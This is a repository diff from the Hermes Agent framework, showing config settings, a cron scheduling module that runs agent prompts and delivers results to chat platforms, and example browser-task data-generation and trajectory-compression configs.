# To disable, you would need to modify the source code.
# =============================================================================
# Code Execution Sandbox (Programmatic Tool Calling)
# =============================================================================
# The execute_code tool runs Python scripts that call Hermes tools via RPC.
# Intermediate tool results stay out of the LLM's context window.
code_execution:
timeout: 300 # Max seconds per script before kill (default: 300 = 5 min)
max_tool_calls: 50 # Max RPC tool calls per execution (default: 50)
# =============================================================================
# Subagent Delegation
# =============================================================================
# The delegate_task tool spawns child agents with isolated context.
# Supports single tasks and batch mode (up to 3 parallel).
delegation:
max_iterations: 50 # Max tool-calling turns per child (default: 50)
default_toolsets: ["terminal", "file", "web"] # Default toolsets for subagents
# model: "google/gemini-3-flash-preview" # Override model for subagents (empty = inherit parent)
# provider: "openrouter" # Override provider for subagents (empty = inherit parent)
# # Resolves full credentials (base_url, api_key) automatically.
# # Supported: openrouter, nous, zai, kimi-coding, minimax
# =============================================================================
# Honcho Integration (Cross-Session User Modeling)
# =============================================================================
# AI-native persistent memory via Honcho (https://honcho.dev/).
# Builds a deeper understanding of the user across sessions and tools.
# Runs alongside USER.md — additive, not a replacement.
#
# Requires: pip install honcho-ai
# Config: ~/.honcho/config.json (shared with Claude Code, Cursor, etc.)
# API key: HONCHO_API_KEY in ~/.hermes/.env or ~/.honcho/config.json
#
# Hermes-specific overrides (optional — most config comes from ~/.honcho/config.json):
# honcho: {}
# =============================================================================
# Display
# =============================================================================
display:
# Use compact banner mode
compact: false
# Tool progress display level (CLI and gateway)
# off: Silent — no tool activity shown, just the final response
# new: Show a tool indicator only when the tool changes (skip repeats)
# all: Show every tool call with a short preview (default)
# verbose: Full args, results, and debug logs (same as /verbose)
# Toggle at runtime with /verbose in the CLI
tool_progress: all
# Background process notifications (gateway/messaging only).
# Controls how chatty the process watcher is when you use
# terminal(background=true, check_interval=...) from Telegram/Discord/etc.
# off: No watcher messages at all
# result: Only the final completion message
# error: Only the final message when exit code != 0
# all: Running output updates + final message (default)
background_process_notifications: all
# Play terminal bell when agent finishes a response.
# Useful for long-running tasks — your terminal will ding when the agent is done.
# Works over SSH. Most terminals can be configured to flash the taskbar or play a sound.
bell_on_complete: false
# Show model reasoning/thinking before each response.
# When enabled, a dim box shows the model's thought process above the response.
# Toggle at runtime with /reasoning show or /reasoning hide.
show_reasoning: false
# ───────────────────────────────────────────────────────────────────────────
# Skin / Theme
# ───────────────────────────────────────────────────────────────────────────
# Customize CLI visual appearance — banner colors, spinner faces, tool prefix,
# response box label, and branding text. Change at runtime with /skin <name>.
#
# Built-in skins:
# default — Classic Hermes gold/kawaii
# ares — Crimson/bronze war-god theme with spinner wings
# mono — Clean grayscale monochrome
# slate — Cool blue developer-focused
#
# Custom skins: drop a YAML file in ~/.hermes/skins/<name>.yaml
# Schema (all fields optional, missing values inherit from default):
#
# name: my-theme
# description: Short description
# colors:
# banner_border: "#HEX" # Panel border
# banner_title: "#HEX" # Panel title
# banner_accent: "#HEX" # Section headers (Available Tools, etc.)
# banner_dim: "#HEX" # Dim/muted text
# banner_text: "#HEX" # Body text (tool names, skill names)
# ui_accent: "#HEX" # UI accent color
# response_border: "#HEX" # Response box border color
# spinner:
# waiting_faces: ["(⚔)", "(⛨)"] # Faces shown while waiting
# thinking_faces: ["(⚔)", "(⌁)"] # Faces shown while thinking
# thinking_verbs: ["forging", "plotting"] # Verbs for spinner messages
# wings: # Optional left/right spinner decorations
# - ["⟪⚔", "⚔⟫"]
# - ["⟪▲", "▲⟫"]
# branding:
# agent_name: "My Agent" # Banner title and branding
# welcome: "Welcome message" # Shown at CLI startup
# response_label: " ⚔ Agent " # Response box header label
# prompt_symbol: "⚔ " # Prompt symbol
# tool_prefix: "╎" # Tool output line prefix (default: ┊)
#
skin: default

5023
cli.py Executable file

File diff suppressed because it is too large Load Diff

35
cron/__init__.py Normal file
View File

@@ -0,0 +1,35 @@
"""
Cron job scheduling system for Hermes Agent.
This module provides scheduled task execution, allowing the agent to:
- Run automated tasks on schedules (cron expressions, intervals, one-shot)
- Self-schedule reminders and follow-up tasks
- Execute tasks in isolated sessions (no prior context)
Cron jobs are executed automatically by the gateway daemon:
hermes gateway install # Install as system service (recommended)
hermes gateway # Or run in foreground
The gateway ticks the scheduler every 60 seconds. A file lock prevents
duplicate execution if multiple processes overlap.
"""
from cron.jobs import (
create_job,
get_job,
list_jobs,
remove_job,
update_job,
JOBS_FILE,
)
from cron.scheduler import tick
__all__ = [
"create_job",
"get_job",
"list_jobs",
"remove_job",
"update_job",
"tick",
"JOBS_FILE",
]

449
cron/jobs.py Normal file
View File

@@ -0,0 +1,449 @@
"""
Cron job storage and management.
Jobs are stored in ~/.hermes/cron/jobs.json
Output is saved to ~/.hermes/cron/output/{job_id}/{timestamp}.md
"""
import json
import tempfile
import os
import re
import uuid
from datetime import datetime, timedelta
from pathlib import Path
from typing import Optional, Dict, List, Any
from hermes_time import now as _hermes_now
try:
from croniter import croniter
HAS_CRONITER = True
except ImportError:
HAS_CRONITER = False
# =============================================================================
# Configuration
# =============================================================================
HERMES_DIR = Path(os.getenv("HERMES_HOME", Path.home() / ".hermes"))
CRON_DIR = HERMES_DIR / "cron"
JOBS_FILE = CRON_DIR / "jobs.json"
OUTPUT_DIR = CRON_DIR / "output"
def _secure_dir(path: Path):
"""Set directory to owner-only access (0700). No-op on Windows."""
try:
os.chmod(path, 0o700)
except (OSError, NotImplementedError):
pass # Windows or other platforms where chmod is not supported
def _secure_file(path: Path):
"""Set file to owner-only read/write (0600). No-op on Windows."""
try:
if path.exists():
os.chmod(path, 0o600)
except (OSError, NotImplementedError):
pass
def ensure_dirs():
"""Ensure cron directories exist with secure permissions."""
CRON_DIR.mkdir(parents=True, exist_ok=True)
OUTPUT_DIR.mkdir(parents=True, exist_ok=True)
_secure_dir(CRON_DIR)
_secure_dir(OUTPUT_DIR)
# =============================================================================
# Schedule Parsing
# =============================================================================
def parse_duration(s: str) -> int:
"""
Parse duration string into minutes.
Examples:
"30m" → 30
"2h" → 120
"1d" → 1440
"""
s = s.strip().lower()
match = re.match(r'^(\d+)\s*(m|min|mins|minute|minutes|h|hr|hrs|hour|hours|d|day|days)$', s)
if not match:
raise ValueError(f"Invalid duration: '{s}'. Use format like '30m', '2h', or '1d'")
value = int(match.group(1))
unit = match.group(2)[0] # First char: m, h, or d
multipliers = {'m': 1, 'h': 60, 'd': 1440}
return value * multipliers[unit]
def parse_schedule(schedule: str) -> Dict[str, Any]:
"""
Parse schedule string into structured format.
Returns dict with:
- kind: "once" | "interval" | "cron"
- For "once": "run_at" (ISO timestamp)
- For "interval": "minutes" (int)
- For "cron": "expr" (cron expression)
Examples:
"30m" → once in 30 minutes
"2h" → once in 2 hours
"every 30m" → recurring every 30 minutes
"every 2h" → recurring every 2 hours
"0 9 * * *" → cron expression
"2026-02-03T14:00" → once at timestamp
"""
schedule = schedule.strip()
original = schedule
schedule_lower = schedule.lower()
# "every X" pattern → recurring interval
if schedule_lower.startswith("every "):
duration_str = schedule[6:].strip()
minutes = parse_duration(duration_str)
return {
"kind": "interval",
"minutes": minutes,
"display": f"every {minutes}m"
}
# Check for cron expression (5 or 6 space-separated fields)
# Cron fields: minute hour day month weekday [year]
parts = schedule.split()
if len(parts) >= 5 and all(
re.match(r'^[\d\*\-,/]+$', p) for p in parts[:5]
):
if not HAS_CRONITER:
raise ValueError("Cron expressions require 'croniter' package. Install with: pip install croniter")
# Validate cron expression
try:
croniter(schedule)
except Exception as e:
raise ValueError(f"Invalid cron expression '{schedule}': {e}")
return {
"kind": "cron",
"expr": schedule,
"display": schedule
}
# ISO timestamp (contains T or looks like date)
if 'T' in schedule or re.match(r'^\d{4}-\d{2}-\d{2}', schedule):
try:
# Parse and validate
dt = datetime.fromisoformat(schedule.replace('Z', '+00:00'))
return {
"kind": "once",
"run_at": dt.isoformat(),
"display": f"once at {dt.strftime('%Y-%m-%d %H:%M')}"
}
except ValueError as e:
raise ValueError(f"Invalid timestamp '{schedule}': {e}")
# Duration like "30m", "2h", "1d" → one-shot from now
try:
minutes = parse_duration(schedule)
run_at = _hermes_now() + timedelta(minutes=minutes)
return {
"kind": "once",
"run_at": run_at.isoformat(),
"display": f"once in {original}"
}
except ValueError:
pass
raise ValueError(
f"Invalid schedule '{original}'. Use:\n"
f" - Duration: '30m', '2h', '1d' (one-shot)\n"
f" - Interval: 'every 30m', 'every 2h' (recurring)\n"
f" - Cron: '0 9 * * *' (cron expression)\n"
f" - Timestamp: '2026-02-03T14:00:00' (one-shot at time)"
)
def _ensure_aware(dt: datetime) -> datetime:
"""Return a timezone-aware datetime in Hermes configured timezone.
Backward compatibility:
- Older stored timestamps may be naive.
- Naive values are interpreted as *system-local wall time* (the timezone
`datetime.now()` used when they were created), then converted to the
configured Hermes timezone.
This preserves relative ordering for legacy naive timestamps across
timezone changes and avoids false not-due results.
"""
target_tz = _hermes_now().tzinfo
if dt.tzinfo is None:
local_tz = datetime.now().astimezone().tzinfo
return dt.replace(tzinfo=local_tz).astimezone(target_tz)
return dt.astimezone(target_tz)
def compute_next_run(schedule: Dict[str, Any], last_run_at: Optional[str] = None) -> Optional[str]:
"""
Compute the next run time for a schedule.
Returns ISO timestamp string, or None if no more runs.
"""
now = _hermes_now()
if schedule["kind"] == "once":
run_at = _ensure_aware(datetime.fromisoformat(schedule["run_at"]))
# If in the future, return it; if in the past, no more runs
return schedule["run_at"] if run_at > now else None
elif schedule["kind"] == "interval":
minutes = schedule["minutes"]
if last_run_at:
# Next run is last_run + interval
last = _ensure_aware(datetime.fromisoformat(last_run_at))
next_run = last + timedelta(minutes=minutes)
else:
# First run is now + interval
next_run = now + timedelta(minutes=minutes)
return next_run.isoformat()
elif schedule["kind"] == "cron":
if not HAS_CRONITER:
return None
cron = croniter(schedule["expr"], now)
next_run = cron.get_next(datetime)
return next_run.isoformat()
return None
# =============================================================================
# Job CRUD Operations
# =============================================================================
def load_jobs() -> List[Dict[str, Any]]:
"""Load all jobs from storage."""
ensure_dirs()
if not JOBS_FILE.exists():
return []
try:
with open(JOBS_FILE, 'r', encoding='utf-8') as f:
data = json.load(f)
return data.get("jobs", [])
except (json.JSONDecodeError, IOError):
return []
def save_jobs(jobs: List[Dict[str, Any]]):
"""Save all jobs to storage."""
ensure_dirs()
fd, tmp_path = tempfile.mkstemp(dir=str(JOBS_FILE.parent), suffix='.tmp', prefix='.jobs_')
try:
with os.fdopen(fd, 'w', encoding='utf-8') as f:
json.dump({"jobs": jobs, "updated_at": _hermes_now().isoformat()}, f, indent=2)
f.flush()
os.fsync(f.fileno())
os.replace(tmp_path, JOBS_FILE)
_secure_file(JOBS_FILE)
except BaseException:
try:
os.unlink(tmp_path)
except OSError:
pass
raise
def create_job(
prompt: str,
schedule: str,
name: Optional[str] = None,
repeat: Optional[int] = None,
deliver: Optional[str] = None,
origin: Optional[Dict[str, Any]] = None
) -> Dict[str, Any]:
"""
Create a new cron job.
Args:
prompt: The prompt to run (must be self-contained)
schedule: Schedule string (see parse_schedule)
name: Optional friendly name
repeat: How many times to run (None = forever, 1 = once)
deliver: Where to deliver output ("origin", "local", "telegram", etc.)
origin: Source info where job was created (for "origin" delivery)
Returns:
The created job dict
"""
parsed_schedule = parse_schedule(schedule)
# Auto-set repeat=1 for one-shot schedules if not specified
if parsed_schedule["kind"] == "once" and repeat is None:
repeat = 1
# Default delivery to origin if available, otherwise local
if deliver is None:
deliver = "origin" if origin else "local"
job_id = uuid.uuid4().hex[:12]
now = _hermes_now().isoformat()
job = {
"id": job_id,
"name": name or prompt[:50].strip(),
"prompt": prompt,
"schedule": parsed_schedule,
"schedule_display": parsed_schedule.get("display", schedule),
"repeat": {
"times": repeat, # None = forever
"completed": 0
},
"enabled": True,
"created_at": now,
"next_run_at": compute_next_run(parsed_schedule),
"last_run_at": None,
"last_status": None,
"last_error": None,
# Delivery configuration
"deliver": deliver,
"origin": origin, # Tracks where job was created for "origin" delivery
}
jobs = load_jobs()
jobs.append(job)
save_jobs(jobs)
return job
def get_job(job_id: str) -> Optional[Dict[str, Any]]:
"""Get a job by ID."""
jobs = load_jobs()
for job in jobs:
if job["id"] == job_id:
return job
return None
def list_jobs(include_disabled: bool = False) -> List[Dict[str, Any]]:
"""List all jobs, optionally including disabled ones."""
jobs = load_jobs()
if not include_disabled:
jobs = [j for j in jobs if j.get("enabled", True)]
return jobs
def update_job(job_id: str, updates: Dict[str, Any]) -> Optional[Dict[str, Any]]:
"""Update a job by ID."""
jobs = load_jobs()
for i, job in enumerate(jobs):
if job["id"] == job_id:
jobs[i] = {**job, **updates}
save_jobs(jobs)
return jobs[i]
return None
def remove_job(job_id: str) -> bool:
"""Remove a job by ID."""
jobs = load_jobs()
original_len = len(jobs)
jobs = [j for j in jobs if j["id"] != job_id]
if len(jobs) < original_len:
save_jobs(jobs)
return True
return False
def mark_job_run(job_id: str, success: bool, error: Optional[str] = None):
"""
Mark a job as having been run.
Updates last_run_at, last_status, increments completed count,
computes next_run_at, and auto-deletes if repeat limit reached.
"""
jobs = load_jobs()
for i, job in enumerate(jobs):
if job["id"] == job_id:
now = _hermes_now().isoformat()
job["last_run_at"] = now
job["last_status"] = "ok" if success else "error"
job["last_error"] = error if not success else None
# Increment completed count
if job.get("repeat"):
job["repeat"]["completed"] = job["repeat"].get("completed", 0) + 1
# Check if we've hit the repeat limit
times = job["repeat"].get("times")
completed = job["repeat"]["completed"]
if times is not None and completed >= times:
# Remove the job (limit reached)
jobs.pop(i)
save_jobs(jobs)
return
# Compute next run
job["next_run_at"] = compute_next_run(job["schedule"], now)
# If no next run (one-shot completed), disable
if job["next_run_at"] is None:
job["enabled"] = False
save_jobs(jobs)
return
save_jobs(jobs)
def get_due_jobs() -> List[Dict[str, Any]]:
"""Get all jobs that are due to run now."""
now = _hermes_now()
jobs = load_jobs()
due = []
for job in jobs:
if not job.get("enabled", True):
continue
next_run = job.get("next_run_at")
if not next_run:
continue
next_run_dt = _ensure_aware(datetime.fromisoformat(next_run))
if next_run_dt <= now:
due.append(job)
return due
def save_job_output(job_id: str, output: str):
"""Save job output to file."""
ensure_dirs()
job_output_dir = OUTPUT_DIR / job_id
job_output_dir.mkdir(parents=True, exist_ok=True)
_secure_dir(job_output_dir)
timestamp = _hermes_now().strftime("%Y-%m-%d_%H-%M-%S")
output_file = job_output_dir / f"{timestamp}.md"
fd, tmp_path = tempfile.mkstemp(dir=str(job_output_dir), suffix='.tmp', prefix='.output_')
try:
with os.fdopen(fd, 'w', encoding='utf-8') as f:
f.write(output)
f.flush()
os.fsync(f.fileno())
os.replace(tmp_path, output_file)
_secure_file(output_file)
except BaseException:
try:
os.unlink(tmp_path)
except OSError:
pass
raise
return output_file

396
cron/scheduler.py Normal file
View File

@@ -0,0 +1,396 @@
"""
Cron job scheduler - executes due jobs.
Provides tick() which checks for due jobs and runs them. The gateway
calls this every 60 seconds from a background thread.
Uses a file-based lock (~/.hermes/cron/.tick.lock) so only one tick
runs at a time if multiple processes overlap.
"""
import asyncio
import logging
import os
import sys
import traceback
# fcntl is Unix-only; on Windows use msvcrt for file locking
try:
import fcntl
except ImportError:
fcntl = None
try:
import msvcrt
except ImportError:
msvcrt = None
from datetime import datetime
from pathlib import Path
from typing import Optional
from hermes_time import now as _hermes_now
logger = logging.getLogger(__name__)
# Add parent directory to path for imports
sys.path.insert(0, str(Path(__file__).parent.parent))
from cron.jobs import get_due_jobs, mark_job_run, save_job_output
# Resolve Hermes home directory (respects HERMES_HOME override)
_hermes_home = Path(os.getenv("HERMES_HOME", Path.home() / ".hermes"))
# File-based lock prevents concurrent ticks from gateway + daemon + systemd timer
_LOCK_DIR = _hermes_home / "cron"
_LOCK_FILE = _LOCK_DIR / ".tick.lock"
def _resolve_origin(job: dict) -> Optional[dict]:
"""Extract origin info from a job, preserving any extra routing metadata."""
origin = job.get("origin")
if not origin:
return None
platform = origin.get("platform")
chat_id = origin.get("chat_id")
if platform and chat_id:
return origin
return None
def _deliver_result(job: dict, content: str) -> None:
"""
Deliver job output to the configured target (origin chat, specific platform, etc.).
Uses the standalone platform send functions from send_message_tool so delivery
works whether or not the gateway is running.
"""
deliver = job.get("deliver", "local")
origin = _resolve_origin(job)
if deliver == "local":
return
thread_id = None
# Resolve target platform + chat_id
if deliver == "origin":
if not origin:
logger.warning("Job '%s' deliver=origin but no origin stored, skipping delivery", job["id"])
return
platform_name = origin["platform"]
chat_id = origin["chat_id"]
thread_id = origin.get("thread_id")
elif ":" in deliver:
platform_name, chat_id = deliver.split(":", 1)
else:
# Bare platform name like "telegram" — need to resolve to origin or home channel
platform_name = deliver
if origin and origin.get("platform") == platform_name:
chat_id = origin["chat_id"]
thread_id = origin.get("thread_id")
else:
# Fall back to home channel
chat_id = os.getenv(f"{platform_name.upper()}_HOME_CHANNEL", "")
if not chat_id:
logger.warning("Job '%s' deliver=%s but no chat_id or home channel. Set via: hermes config set %s_HOME_CHANNEL <channel_id>", job["id"], deliver, platform_name.upper())
return
from tools.send_message_tool import _send_to_platform
from gateway.config import load_gateway_config, Platform
platform_map = {
"telegram": Platform.TELEGRAM,
"discord": Platform.DISCORD,
"slack": Platform.SLACK,
"whatsapp": Platform.WHATSAPP,
"signal": Platform.SIGNAL,
"email": Platform.EMAIL,
}
platform = platform_map.get(platform_name.lower())
if not platform:
logger.warning("Job '%s': unknown platform '%s' for delivery", job["id"], platform_name)
return
try:
config = load_gateway_config()
except Exception as e:
logger.error("Job '%s': failed to load gateway config for delivery: %s", job["id"], e)
return
pconfig = config.platforms.get(platform)
if not pconfig or not pconfig.enabled:
logger.warning("Job '%s': platform '%s' not configured/enabled", job["id"], platform_name)
return
# Run the async send in a fresh event loop (safe from any thread)
try:
result = asyncio.run(_send_to_platform(platform, pconfig, chat_id, content, thread_id=thread_id))
except RuntimeError:
# asyncio.run() fails if there's already a running loop in this thread;
# spin up a new thread to avoid that.
import concurrent.futures
with concurrent.futures.ThreadPoolExecutor(max_workers=1) as pool:
future = pool.submit(asyncio.run, _send_to_platform(platform, pconfig, chat_id, content, thread_id=thread_id))
result = future.result(timeout=30)
except Exception as e:
logger.error("Job '%s': delivery to %s:%s failed: %s", job["id"], platform_name, chat_id, e)
return
if result and result.get("error"):
logger.error("Job '%s': delivery error: %s", job["id"], result["error"])
else:
logger.info("Job '%s': delivered to %s:%s", job["id"], platform_name, chat_id)
# Mirror the delivered content into the target's gateway session
try:
from gateway.mirror import mirror_to_session
mirror_to_session(platform_name, chat_id, content, source_label="cron", thread_id=thread_id)
except Exception as e:
logger.warning("Job '%s': mirror_to_session failed: %s", job["id"], e)
def run_job(job: dict) -> tuple[bool, str, str, Optional[str]]:
"""
Execute a single cron job.
Returns:
Tuple of (success, full_output_doc, final_response, error_message)
"""
from run_agent import AIAgent
job_id = job["id"]
job_name = job["name"]
prompt = job["prompt"]
origin = _resolve_origin(job)
logger.info("Running job '%s' (ID: %s)", job_name, job_id)
logger.info("Prompt: %s", prompt[:100])
# Inject origin context so the agent's send_message tool knows the chat
if origin:
os.environ["HERMES_SESSION_PLATFORM"] = origin["platform"]
os.environ["HERMES_SESSION_CHAT_ID"] = str(origin["chat_id"])
if origin.get("chat_name"):
os.environ["HERMES_SESSION_CHAT_NAME"] = origin["chat_name"]
try:
# Re-read .env and config.yaml fresh every run so provider/key
# changes take effect without a gateway restart.
from dotenv import load_dotenv
try:
load_dotenv(str(_hermes_home / ".env"), override=True, encoding="utf-8")
except UnicodeDecodeError:
load_dotenv(str(_hermes_home / ".env"), override=True, encoding="latin-1")
model = os.getenv("HERMES_MODEL") or "anthropic/claude-opus-4.6"
# Load config.yaml for model, reasoning, prefill, toolsets, provider routing
_cfg = {}
try:
import yaml
_cfg_path = str(_hermes_home / "config.yaml")
if os.path.exists(_cfg_path):
with open(_cfg_path) as _f:
_cfg = yaml.safe_load(_f) or {}
_model_cfg = _cfg.get("model", {})
if isinstance(_model_cfg, str):
model = _model_cfg
elif isinstance(_model_cfg, dict):
model = _model_cfg.get("default", model)
except Exception as e:
logger.warning("Job '%s': failed to load config.yaml, using defaults: %s", job_id, e)
# Reasoning config from env or config.yaml
reasoning_config = None
effort = os.getenv("HERMES_REASONING_EFFORT", "")
if not effort:
effort = str(_cfg.get("agent", {}).get("reasoning_effort", "")).strip()
if effort and effort.lower() != "none":
valid = ("xhigh", "high", "medium", "low", "minimal")
if effort.lower() in valid:
reasoning_config = {"enabled": True, "effort": effort.lower()}
elif effort.lower() == "none":
reasoning_config = {"enabled": False}
# Prefill messages from env or config.yaml
prefill_messages = None
prefill_file = os.getenv("HERMES_PREFILL_MESSAGES_FILE", "") or _cfg.get("prefill_messages_file", "")
if prefill_file:
import json as _json
pfpath = Path(prefill_file).expanduser()
if not pfpath.is_absolute():
pfpath = _hermes_home / pfpath
if pfpath.exists():
try:
with open(pfpath, "r", encoding="utf-8") as _pf:
prefill_messages = _json.load(_pf)
if not isinstance(prefill_messages, list):
prefill_messages = None
except Exception as e:
logger.warning("Job '%s': failed to parse prefill messages file '%s': %s", job_id, pfpath, e)
prefill_messages = None
# Max iterations
max_iterations = _cfg.get("agent", {}).get("max_turns") or _cfg.get("max_turns") or 90
# Provider routing
pr = _cfg.get("provider_routing", {})
from hermes_cli.runtime_provider import (
resolve_runtime_provider,
format_runtime_provider_error,
)
try:
runtime = resolve_runtime_provider(
requested=os.getenv("HERMES_INFERENCE_PROVIDER"),
)
except Exception as exc:
message = format_runtime_provider_error(exc)
raise RuntimeError(message) from exc
agent = AIAgent(
model=model,
api_key=runtime.get("api_key"),
base_url=runtime.get("base_url"),
provider=runtime.get("provider"),
api_mode=runtime.get("api_mode"),
max_iterations=max_iterations,
reasoning_config=reasoning_config,
prefill_messages=prefill_messages,
providers_allowed=pr.get("only"),
providers_ignored=pr.get("ignore"),
providers_order=pr.get("order"),
provider_sort=pr.get("sort"),
quiet_mode=True,
session_id=f"cron_{job_id}_{_hermes_now().strftime('%Y%m%d_%H%M%S')}"
)
result = agent.run_conversation(prompt)
final_response = result.get("final_response", "")
if not final_response:
final_response = "(No response generated)"
output = f"""# Cron Job: {job_name}
**Job ID:** {job_id}
**Run Time:** {_hermes_now().strftime('%Y-%m-%d %H:%M:%S')}
**Schedule:** {job.get('schedule_display', 'N/A')}
## Prompt
{prompt}
## Response
{final_response}
"""
logger.info("Job '%s' completed successfully", job_name)
return True, output, final_response, None
except Exception as e:
error_msg = f"{type(e).__name__}: {str(e)}"
logger.error("Job '%s' failed: %s", job_name, error_msg)
output = f"""# Cron Job: {job_name} (FAILED)
**Job ID:** {job_id}
**Run Time:** {_hermes_now().strftime('%Y-%m-%d %H:%M:%S')}
**Schedule:** {job.get('schedule_display', 'N/A')}
## Prompt
{prompt}
## Error
```
{error_msg}
{traceback.format_exc()}
```
"""
return False, output, "", error_msg
finally:
# Clean up injected env vars so they don't leak to other jobs
for key in ("HERMES_SESSION_PLATFORM", "HERMES_SESSION_CHAT_ID", "HERMES_SESSION_CHAT_NAME"):
os.environ.pop(key, None)
def tick(verbose: bool = True) -> int:
"""
Check and run all due jobs.
Uses a file lock so only one tick runs at a time, even if the gateway's
in-process ticker and a standalone daemon or manual tick overlap.
Args:
verbose: Whether to print status messages
Returns:
Number of jobs executed (0 if another tick is already running)
"""
_LOCK_DIR.mkdir(parents=True, exist_ok=True)
# Cross-platform file locking: fcntl on Unix, msvcrt on Windows
lock_fd = None
try:
lock_fd = open(_LOCK_FILE, "w")
if fcntl:
fcntl.flock(lock_fd, fcntl.LOCK_EX | fcntl.LOCK_NB)
elif msvcrt:
msvcrt.locking(lock_fd.fileno(), msvcrt.LK_NBLCK, 1)
except (OSError, IOError):
logger.debug("Tick skipped — another instance holds the lock")
if lock_fd is not None:
lock_fd.close()
return 0
try:
due_jobs = get_due_jobs()
if verbose and not due_jobs:
logger.info("%s - No jobs due", _hermes_now().strftime('%H:%M:%S'))
return 0
if verbose:
logger.info("%s - %s job(s) due", _hermes_now().strftime('%H:%M:%S'), len(due_jobs))
executed = 0
for job in due_jobs:
try:
success, output, final_response, error = run_job(job)
output_file = save_job_output(job["id"], output)
if verbose:
logger.info("Output saved to: %s", output_file)
# Deliver the final response to the origin/target chat
deliver_content = final_response if success else f"⚠️ Cron job '{job.get('name', job['id'])}' failed:\n{error}"
if deliver_content:
try:
_deliver_result(job, deliver_content)
except Exception as de:
logger.error("Delivery failed for job %s: %s", job["id"], de)
mark_job_run(job["id"], success, error)
executed += 1
except Exception as e:
logger.error("Error processing job %s: %s", job['id'], e)
mark_job_run(job["id"], False, str(e))
return executed
finally:
if fcntl:
fcntl.flock(lock_fd, fcntl.LOCK_UN)
elif msvcrt:
try:
msvcrt.locking(lock_fd.fileno(), msvcrt.LK_UNLCK, 1)
except (OSError, IOError):
pass
lock_fd.close()
if __name__ == "__main__":
tick(verbose=True)

View File

@@ -0,0 +1,5 @@
{"prompt": "Go to https://news.ycombinator.com and find the top 5 posts on the front page. For each post, get the title, URL, points, and number of comments. Return the results as a formatted summary."}
{"prompt": "Navigate to https://en.wikipedia.org/wiki/Hermes and extract the first paragraph of the article, the image caption, and the list of items in the infobox. Summarize what you find."}
{"prompt": "Go to https://github.com/trending and find the top 3 trending repositories today. For each repo, get the name, description, language, and star count. Write the results to a file called trending_repos.md."}
{"prompt": "Visit https://httpbin.org/forms/post and fill out the form with sample data (customer name: Jane Doe, size: Medium, topping: Bacon, delivery time: 12:00). Submit the form and report what the response page shows."}
{"prompt": "Navigate to https://books.toscrape.com, browse to the Travel category, find the highest-rated book, and extract its title, price, availability, and description."}

View File

@@ -0,0 +1,65 @@
#!/bin/bash
# =============================================================================
# Example: Browser-Focused Data Generation
# =============================================================================
#
# Generates tool-calling trajectories for browser automation tasks.
# The agent navigates websites, fills forms, extracts information, etc.
#
# Distribution: browser 97%, web 20%, vision 12%, terminal 15%
#
# Prerequisites:
# - OPENROUTER_API_KEY in ~/.hermes/.env
# - BROWSERBASE_API_KEY in ~/.hermes/.env (for browser tools)
# - A dataset JSONL file with one {"prompt": "..."} per line
#
# Usage:
# cd ~/.hermes/hermes-agent
# bash datagen-config-examples/run_browser_tasks.sh
#
# Output: data/browser_tasks_example/trajectories.jsonl
# =============================================================================
mkdir -p logs
LOG_FILE="logs/browser_tasks_$(date +%Y%m%d_%H%M%S).log"
echo "📝 Logging to: $LOG_FILE"
# Point to the example dataset in this directory
SCRIPT_DIR="$(cd "$(dirname "$0")" && pwd)"
python batch_runner.py \
--dataset_file="$SCRIPT_DIR/example_browser_tasks.jsonl" \
--batch_size=5 \
--run_name="browser_tasks_example" \
--distribution="browser_tasks" \
--model="anthropic/claude-sonnet-4" \
--base_url="https://openrouter.ai/api/v1" \
--num_workers=3 \
--max_turns=30 \
--ephemeral_system_prompt="You are an AI assistant with browser automation capabilities. Your primary task is to navigate and interact with web pages to accomplish user goals.
IMPORTANT GUIDELINES:
1. SEARCHING: Do NOT search directly on Google via the browser — they block automated searches. Use the web_search tool first to find URLs, then navigate to them with browser tools.
2. COOKIE/PRIVACY DIALOGS: After navigating to a page, check for cookie consent or privacy popups. Dismiss them by clicking Accept/Close/OK before interacting with other elements. Take a fresh browser_snapshot afterward.
3. HANDLING TIMEOUTS: If an action times out, the element may be blocked by an overlay. Take a new snapshot and look for dialogs to dismiss. If none, try an alternative approach or report the issue.
4. GENERAL: Use browser tools to click, fill forms, and extract information. Use terminal for local file operations. Verify your actions and handle errors gracefully." \
2>&1 | tee "$LOG_FILE"
echo "✅ Done. Log: $LOG_FILE"
# =============================================================================
# Common options you can add:
#
# --resume Resume from checkpoint if interrupted
# --verbose Enable detailed logging
# --max_tokens=63000 Set max response tokens
# --reasoning_disabled Disable model thinking/reasoning tokens
# --providers_allowed="anthropic,google" Restrict to specific providers
# --prefill_messages_file="configs/prefill.json" Few-shot priming
# =============================================================================

View File

@@ -0,0 +1,101 @@
# Trajectory Compression Configuration
#
# Post-processes completed agent trajectories to fit within a target token budget.
# Compression preserves head/tail turns and summarizes middle content only as needed.
# Tokenizer settings for accurate token counting
tokenizer:
# HuggingFace tokenizer name
name: "moonshotai/Kimi-K2-Thinking"
# Trust remote code (required for some tokenizers)
trust_remote_code: true
# Compression targets and behavior
compression:
# Target maximum tokens for compressed trajectory
target_max_tokens: 29000
# Target size for summary (in tokens)
# This is factored into calculations when determining what to compress
summary_target_tokens: 750
# Protected turns that should NEVER be compressed
protected_turns:
# Always protect the first system message (tool definitions)
first_system: true
# Always protect the first human message (original request)
first_human: true
# Always protect the first gpt message (initial response/tool_call)
first_gpt: true
# Always protect the first tool response (result of first action)
first_tool: true
# Always protect the last 2 complete turn pairs (gpt+tool or gpt only)
# This ensures the model's final actions and conclusions are preserved
last_n_turns: 4
# LLM settings for generating summaries (OpenRouter only)
summarization:
# Model to use for summarization (should be fast and cheap)
# Using OpenRouter model path format
model: "google/gemini-3-flash-preview"
# OpenRouter API settings
base_url: "https://openrouter.ai/api/v1"
# Environment variable containing OpenRouter API key
api_key_env: "OPENROUTER_API_KEY"
# Temperature for summarization (lower = more deterministic)
temperature: 0.3
# Max retries for API failures
max_retries: 3
# Delay between retries (seconds)
retry_delay: 2
# Output settings
output:
# Add notice to system message about potential summarization
add_summary_notice: true
# Text to append to system message
summary_notice_text: "\n\nSome of the conversation may be summarized to preserve context."
# Output directory suffix (appended to input directory name)
output_suffix: "_compressed"
# Processing settings
processing:
# Number of parallel workers for batch processing
num_workers: 4
# Maximum concurrent API calls for summarization (async parallelism)
max_concurrent_requests: 50
# Skip trajectories that are already under target length
skip_under_target: true
# If true, save trajectories even if compression can't get under target
# (will compress as much as possible)
save_over_limit: true
# Timeout per trajectory in seconds (skip if takes longer)
# Helps avoid hanging on problematic entries
per_trajectory_timeout: 300 # 5 minutes
# Metrics to track
metrics:
# Log detailed compression statistics
enabled: true
# Save per-trajectory metrics in output
